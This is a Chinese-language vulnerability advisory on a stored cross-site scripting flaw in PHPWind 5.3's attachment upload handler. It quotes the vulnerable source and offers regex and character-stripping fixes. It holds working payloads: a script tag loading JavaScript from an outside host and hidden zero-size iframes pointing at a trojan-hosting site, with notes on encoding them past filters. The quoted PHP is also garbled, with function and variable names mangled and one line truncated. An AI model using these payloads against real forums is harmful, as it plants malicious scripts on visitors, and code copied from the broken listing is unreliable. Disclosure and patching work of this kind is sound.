文章作者:EvilOctal [E.S.T]
信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])

注意:这只是个漏洞公告并不是通常意义的原创,因此以执行帐号发布。感谢碎片、老周、ring04h等成员的讨论。邪恶八进制信息安全团队已经将该漏洞提交给PHPWind官方。

PHPWind Forums v5.3 postupload.php Cross Site Script(XSS)
PHPWind论坛5.3版postupload.php文件跨站脚本漏洞(XSS)

漏洞产生:
require\postupload.php文件对atc_p_w_upload_name变量过滤不严,导致跨站脚本执行漏洞,可能引起站点被嵌入恶意代码。
记忆碎片最早提供了一个测试效果:
PHPWind论坛5.3版postupload.php附件文件名跨站脚本漏洞(XSS)_休闲
漏洞代码分析:
以下是require\postupload.php文件引起问题的源代码:
……
 $source = $db_ifftp ? $db_ftpweb."/".$fileuplodeurl : $attachdir.'/'.$fileuplodeurl;
 //版块id_文件名_时间.类型
 if($db_ifftp){
 $ftpsize=$ftp->upload($atc_p_w_upload,$fileuplodeurl);
 } elseif(!postupload($atc_p_w_upload,$source)){
 Showmsg('upload_error');
 }
 if(eregi("\.(gif|jpg|png|bmp|swf)$",$atc_p_w_upload_name) && function_exists('getp_w_picpathsize')){//这里只过滤了扩展名
 if(!$img_size=getp_w_picpathsize($source)){
 $db_ifftp ? $ftp->delete($fileuplodeurl) : P_unlink($source);
 Showmsg('upload_content_error');
 }
 if(!$db_ifftp && $attach_ext!='swf' && $db_watermark && $img_size[0]>$db_waterwidth && $img_size[1]>$db_waterheight){
 if (function_exists('p_w_picpathcreatefromgif') && function_exists('p_w_picpathalphablending') && ($attach_ext!='gif' || function_exists('p_w_picpathgif') && ($db_ifgif==2 || $db_ifgif==1 && in_array(PHP_VERSION,array('4.4.3','4.4.4','5.1.5')))) && ($db_waterimg && function_exists('p_w_picpathcopymerge') || !$db_waterimg && function_exists('p_w_picpathttfbbox'))){
 require_once(R_P.'require/watermark.php'); ImgWaterMark($source,$db_waterpos,$db_waterimg,$db_watertext,$db_waterfont,$db_watercolor,$db_waterpct,$db_jpgquality);
 }
 }
 }
 if(eregi("\.(gif|jpg|jpeg|png|bmp|swf)$",$atc_p_w_upload_name)){//这里只过滤了扩展名
 $ifupload=1;
 if(eregi("\.swf$",$atc_p_w_upload_name)){//这里只过滤了扩展名
 $type='zip';
 }else{
 $type='img';
 }
 } elseif(eregi("\.(zip|rar)$",$atc_p_w_upload_name)){//这里只过滤了扩展名
 $ifupload=3;
 $type='zip';
 } elseif(eregi("\.txt$",$atc_p_w_upload_name)){//这里只过滤了扩展名
 $safecheckdb = $db_ifftp ? (function_exists('file_get_contents') ? file_get_contents($source) : '') : readover($source);
 if (strpos($safecheckdb," && strpos($safecheckdb,"submit")!==false && strpos($safecheckdb,"post")!==false && strpos($safecheckdb,"form")!==false){
 $db_ifftp ? $ftp->delete($fileuplodeurl) : P_unlink($source);
 Showmsg('upload_content_error');
 } else{
 $ifupload=2;
 $type='txt';
 }
 } else{
 $ifupload=3;
 $type='zip';
 }
 $size = $db_ifftp ? ceil($ftpsize/1024) : ceil(filesize("$attachdir/$fileuplodeurl")/1024);
 $atc_p_w_upload_name=addslashes($atc_p_w_upload_name);
 if($ifreplace==0){//下面已经准备提交到数据库
 $db->update("INSERT INTO pw_attachs SET fid='$fid',uid='$winduid',hits=0,name='$atc_p_w_upload_name',type='$type',size='$size',attachurl='$fileuplodeurl',needrvrc='$needrvrc',uploadtime='$timestamp',descrip='$descrip'");
 $aid = $db->insert_id();
 $attachs[$aid] = array(
 'aid' => $aid,
 'name' => stripslashes($atc_p_w_upload_name),//取出转译斜线便于入库
 'type' => $type,
 'attachurl' => $fileuplodeurl,
 'needrvrc' => $needrvrc,
 'size' => $size,
 'hits' => 0,
 'desc' => str_replace('\\','',$descrip)
 );
 } else {
 $aid=$replacedb[$i]['aid'];
 $db->update("UPDATE pw_attachs SET name='$atc_p_w_upload_name',type='$type',size='$size',attachurl='$fileuplodeurl',needrvrc='$needrvrc',uploadtime='$timestamp',descrip='$descrip' WHERE aid='$aid'");
 $oldattach[$aid]['name']=$atc_p_w_upload_name;
 $oldattach[$aid]['type']=$type;
 $oldattach[$aid]['size']=$size;
 }
}
……
可以看到postupload.php文件没有对atc_p_w_upload_name这个变量提交的名字进行过滤。

漏洞测试:
只要在附件提交的地址框(不是描述框)填写精心构造的恶意跨站脚本即可实现跨站测试,可被别有用心者用来挂马等。
测试方法一 下面是zhouzhen提供的测试代码加图片:

老周的代码明文内容如下:
D:\zhouzhen<img src=http://forum.eviloctal.com/p_w_picpath/wind/logo.png>XXS.rar
PHPWind论坛5.3版postupload.php附件文件名跨站脚本漏洞(XSS)_PHPWind_02
因为不能出现//等字符,可以采用ASSIC编码,将可以嵌入恶意脚本。

临时修补:
修补方法一 正则表达式:
在源文件的代码151行后(也就是上面代码块的45行后),也就是在MySQL的查询被执行之前,做一次最后的文件名过滤。
if(isset($atc_p_w_upload_name)){
 if(!eregi("^[_a-z0-9-]+\.(gif|jpg|jpeg|png|bmp|zip|rar|gz|tgz|7z)$",$atc_p_w_upload_name)){//扩展名允许规则请根据自己站点的情况自行更改
 echo "EST Name Fail!";
 exit;
 }
 }
修补方法二 字符串替换:
临时解决跨站问题可以过滤掉尖括号符号,使脚本无法构成。
修改源文件的代码157行(也就是上面代码块的51行)为如下代码:
$atc_p_w_upload_name = stripslashes(str_replace("<","",$atc_p_w_upload_name));

ring04h:
在附件处填写:
D:\ring04h:<SCRIPT SRC=http://www.diaonilaomu.com/x.js>XSS.rar
转换为ASSIC编码POST:
PHPWind论坛5.3版postupload.php附件文件名跨站脚本漏洞(XSS)_职场_03

黑病毒:
不用远程调用JS文件,也可以直接达到挂马的效果如下
本地测试环境:phpwind5.0.1
D:\zhouzhen<iframe src=http://www.muma.com/><%2Fiframe>XXS.rar

D:\zhouzhen<iframe src=http://www.muma.com/test.htm width=0 height=0><%2Fiframe>XXS.rar
过滤了/和",构造语句如上。
[url]http://www.muma.com/test.htm[/url] 十六进制编码即可